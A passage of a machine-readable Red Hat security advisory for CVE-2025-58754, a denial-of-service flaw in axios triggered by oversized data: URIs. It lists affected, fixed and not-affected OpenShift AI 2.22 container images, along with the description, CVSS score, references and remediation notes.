"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2394735"
}
],
"notes": [
{
"category": "description",
"text": "Axios is a promise based HTTP client for the browser and Node.js. When Axios prior to versions 0.30.2 and 1.12.0 runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`. Versions 0.30.2 and 1.12.0 contain a patch for the issue.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios DoS via lack of data size check",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Availability impact is limited to the application which bundles axios and not the host Red Hat system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "RHBZ#2394735",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394735"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593",
"url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/pull/7011",
"url": "https://github.com/axios/axios/pull/7011"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.12.0",
"url": "https://github.com/axios/axios/releases/tag/v1.12.0"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj",
"url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
}
],
"release_date": "2025-09-12T01:16:40.513000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
